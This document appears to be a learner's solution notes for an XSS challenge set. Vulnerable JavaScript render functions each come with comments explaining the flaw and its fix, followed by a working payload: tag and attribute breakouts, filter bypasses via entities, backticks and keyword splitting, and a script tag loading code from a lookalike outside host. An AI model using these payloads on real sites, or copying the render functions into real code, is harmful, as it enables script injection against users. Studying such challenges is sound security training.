xss学习1

/**
 * Wrap `input` in a <div> element and return the markup as a string.
 *
 * Security note: `input` is concatenated into HTML element content with no
 * output encoding, so any markup it contains is parsed as markup by the
 * browser. A safe variant HTML-encodes at least `&`, `<` and `>` before
 * building the string, or assigns the value through `textContent` on a DOM node.
 *
 * @param {string} input - text to place inside the element (treat as untrusted).
 * @returns {string} `<div>` markup containing `input` verbatim.
 */
function render (input) {
  const open = '<div>'
  const close = '</div>'
  return `${open}${input}${close}`
}
//input code
<script>alert(1)</script>
/**
 * Wrap `input` in a <textarea> element and return the markup as a string.
 *
 * Security note: text inside <textarea> is not parsed as markup, but only up
 * to the first `</textarea>` end tag. Because `input` is not encoded, a value
 * containing that end tag closes the element and everything after it is
 * parsed as ordinary HTML. Encoding `&` and `<` on output prevents this.
 *
 * @param {string} input - text to place inside the element (treat as untrusted).
 * @returns {string} `<textarea>` markup containing `input` verbatim.
 */
function render (input) {
  const tag = 'textarea'
  return `<${tag}>${input}</${tag}>`
}
//input code
</textarea><script>alert(1)</script>
/**
 * Build an <input> element whose `value` attribute is set to `input`.
 *
 * Security note: `input` lands inside a double-quoted attribute value without
 * encoding, so a `"` in the value ends the attribute and the rest is parsed
 * as further attributes or markup. For this context the value must be
 * attribute-encoded (at least `&` and `"`, conventionally `<` and `>` too),
 * or set through the DOM with `element.value = ...`.
 *
 * @param {string} input - attribute value (treat as untrusted).
 * @returns {string} `<input>` markup with `input` inserted verbatim.
 */
function render (input) {
  return `<input type="name" value="${input}">`
}
//input code
"><script>alert(1)</script>
/**
 * Remove every `(` and `)` from `input` and return the rest unchanged.
 *
 * Security note: this is a character denylist, not output encoding. `<`, `>`
 * and `&` pass through untouched, so the result is still parsed as markup
 * when written into a page, and JavaScript has call syntaxes that need no
 * parentheses. The durable fix is to HTML-encode on output rather than to
 * remove individual characters.
 *
 * @param {string} input - text to filter (treat as untrusted).
 * @returns {string} `input` with all parentheses removed.
 */
function render (input) {
  return input.replace(/[()]/g, '')
}
//input code
<script>alert`1`</script>
/**
 * Remove every `(`, `)` and backtick from `input` and return the rest unchanged.
 *
 * Security note: the filter only sees the literal characters in the raw
 * string. `&` is not filtered, so HTML character references survive, and in
 * contexts where the HTML parser decodes them before the script engine runs
 * the removed characters reappear. Denylisting characters does not replace
 * output encoding of `&`, `<` and `>`.
 *
 * @param {string} input - text to filter (treat as untrusted).
 * @returns {string} `input` with parentheses and backticks removed.
 */
function render (input) {
  const banned = /[()`]/g
  return input.replace(banned, '')
}
//input code
<svg><script>alert&#40;1&#41;</script
/**
 * Place `input` inside an HTML comment after replacing each `-->` with an emoji.
 *
 * Security note: only the exact sequence `-->` is neutralised. The HTML
 * parser also treats `--!>` as the end of a comment, so the filter does not
 * cover every way a comment can be closed. Untrusted text should not be
 * written into comments at all; if it must be, encode `<`, `>` and `-`.
 *
 * @param {string} input - comment text (treat as untrusted).
 * @returns {string} an HTML comment containing the filtered text.
 */
function render (input) {
  const body = input.replace(/-->/g, '😂')
  return `<!-- ${body} -->`
}
//input code 
--!> <script>alert(1)</script>
/**
 * Insert `input` as extra attributes of an <input> element after replacing
 * `auto`, `on...=` and `>` (case-insensitively) with `_`.
 *
 * Security note: `input` is interpolated where attribute names are expected,
 * which a denylist cannot make safe. Two gaps are visible in the code:
 *   - `.` in `on.*=` does not match line terminators, so an attribute name
 *     and its `=` on different lines are not filtered;
 *   - the injected text comes before `type="text"`, and when an attribute is
 *     repeated the HTML parser keeps the first occurrence.
 * Untrusted data belongs only inside a quoted, encoded attribute value.
 *
 * @param {string} input - attribute text (treat as untrusted).
 * @returns {string} `<input>` markup with the filtered text inserted.
 */
function render (input) {
  const filtered = input.replace(/auto|on.*=|>/ig, '_')
  return '<input value=1 ' + filtered + ' type="text">'
}
//input code
type=image   
onerror
=alert(1) src

/**
 * Strip tag-like substrings from `input` and wrap the result in <article>.
 *
 * Security note: the pattern only matches a `<...>` sequence that already
 * has its closing `>`. An unterminated `<name ...` is left in place, and the
 * `>` of the appended `</article>` can then complete it in the browser.
 * Tag stripping by regex is not a sanitiser; HTML-encode `&`, `<` and `>`
 * on output instead.
 *
 * @param {string} input - article text (treat as untrusted).
 * @returns {string} `<article>` markup containing the filtered text.
 */
function render (input) {
  const withoutTags = input.replace(/<\/?[^>]+>/gi, '')
  return '<article>' + withoutTags + '</article>'
}
//input code
<svg onload=alert(1)
/**
 * Embed `src` in a <style> element after replacing each literal `</style>`
 * (case-insensitive) with a CSS comment.
 *
 * Security note: the pattern matches only the exact text `</style>`. HTML
 * end tags may contain whitespace before the closing `>`, so the filter does
 * not cover every spelling that closes the element. Untrusted text should
 * not be interpolated into a style sheet; at minimum `<` must be escaped so
 * that no end tag can be formed.
 *
 * @param {string} src - CSS source (treat as untrusted).
 * @returns {string} a `<style>` block, with the surrounding whitespace of the
 *   original template preserved.
 */
function render (src) {
  const css = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')
  // Same layout as a multi-line template: leading newline, indented lines,
  // and a final line holding two spaces.
  const lines = ['', '    <style>', '      ' + css, '    </style>', '  ']
  return lines.join('\n')
}
//input code
</style ><script>alert(1)</script>
/**
 * Return a <script src> tag for `input` if it starts with the expected
 * origin, otherwise the string 'Invalid URL'.
 *
 * Security note: the check is a prefix match. The pattern is anchored at the
 * start but not after the host name, so any URL whose host merely begins
 * with `www.segmentfault.com` passes, and plain `http:` is accepted as well.
 * A robust check parses the value with `new URL(...)`, compares `hostname`
 * for exact equality against an allowlist, and requires `https:`. `input` is
 * also placed in the attribute without encoding.
 *
 * @param {string} input - script URL (treat as untrusted).
 * @returns {string} script tag markup, or 'Invalid URL'.
 */
function render (input) {
  const allowedPrefix = /^https?:\/\/www\.segmentfault\.com/
  if (!allowedPrefix.test(input)) {
    return 'Invalid URL'
  }
  return '<script src="' + input + '"></script>'
}
//input code
http://www.segmentfault.com.xss.com/j.js


/**
 * Upper-case `input` and wrap it in an <h1> element.
 *
 * Security note: upper-casing is not a sanitiser. HTML tag and attribute
 * names are case-insensitive, so markup in `input` is still parsed as markup;
 * only case-sensitive content such as JavaScript identifiers is altered.
 * HTML-encode `&`, `<` and `>` before building the heading.
 *
 * @param {string} input - heading text (treat as untrusted).
 * @returns {string} `<h1>` markup containing the upper-cased text.
 */
function render (input) {
  return '<h1>' + input.toUpperCase() + '</h1>'
}

/**
 * Delete every occurrence of `script` (case-insensitive) from `input`,
 * upper-case the result and wrap it in an <h1> element.
 *
 * Security note: the removal is a single pass. Deleting a match can join the
 * text on either side of it into a new occurrence of the same word, which is
 * not removed again. Removing keywords is therefore not a defence; the
 * output needs HTML encoding of `&`, `<` and `>` instead.
 *
 * @param {string} input - heading text (treat as untrusted).
 * @returns {string} `<h1>` markup containing the filtered, upper-cased text.
 */
function render (input) {
  const heading = input.replace(/script/ig, '').toUpperCase()
  return `<h1>${heading}</h1>`
}
//input code
<scrscriptipt src="http://www.segmentfault.com.xss.com/j.js"></scscriptript>
/**
 * Build an <img> element whose `onerror` handler logs `input` with
 * `console.error`, after HTML-entity-encoding `&`, `'`, `"`, `<`, `>` and `/`.
 *
 * Security note: the encoding does not match the context. The value sits in
 * a JavaScript string literal inside an HTML attribute. The HTML parser
 * decodes character references in attribute values before the handler source
 * is compiled, so an encoded quote is a real quote again by the time the
 * JavaScript runs. Untrusted data should not be placed in inline event
 * handlers; attach the handler from script and pass the value as data, or
 * apply JavaScript string escaping first and attribute encoding second.
 *
 * @param {string} input - message text (treat as untrusted).
 * @returns {string} `<img>` markup with the entity-encoded text in `onerror`.
 */
function render (input) {
  // One pass over the string gives the same result as the chained replaces:
  // `&` is handled in the same sweep, so entities produced for the other
  // characters are never re-encoded.
  const entities = {
    '&': '&amp;',
    "'": '&#39;',
    '"': '&quot;',
    '<': '&lt;',
    '>': '&gt;',
    '/': '&#x2f;'
  }
  const escapeHtml = (s) => s.replace(/[&'"<>/]/g, (ch) => entities[ch])
  return '<img src onerror="console.error(\'' + escapeHtml(input) + '\')">'
}

//input code
');alert('1
/**
 * Emit a <script> block that assigns `input` to `window.data`.
 *
 * Security note: `input` is inserted as JavaScript source, not as data, so
 * whatever expression it contains is executed by the browser. To pass a
 * value to the page, serialise it with `JSON.stringify` and escape `<` in
 * the result so that no `</script>` sequence can be formed, or carry it in
 * an encoded `data-*` attribute and read it from script.
 *
 * @param {string} input - text inserted as the right-hand side of the
 *   assignment (treat as untrusted).
 * @returns {string} a `<script>` block, with the surrounding whitespace of
 *   the original template preserved.
 */
function render (input) {
  // Same layout as a multi-line template: leading newline and a final line
  // holding two spaces.
  const lines = ['', '<script>', '  window.data = ' + input, '</script>', '  ']
  return lines.join('\n')
}
//input code
alert(1)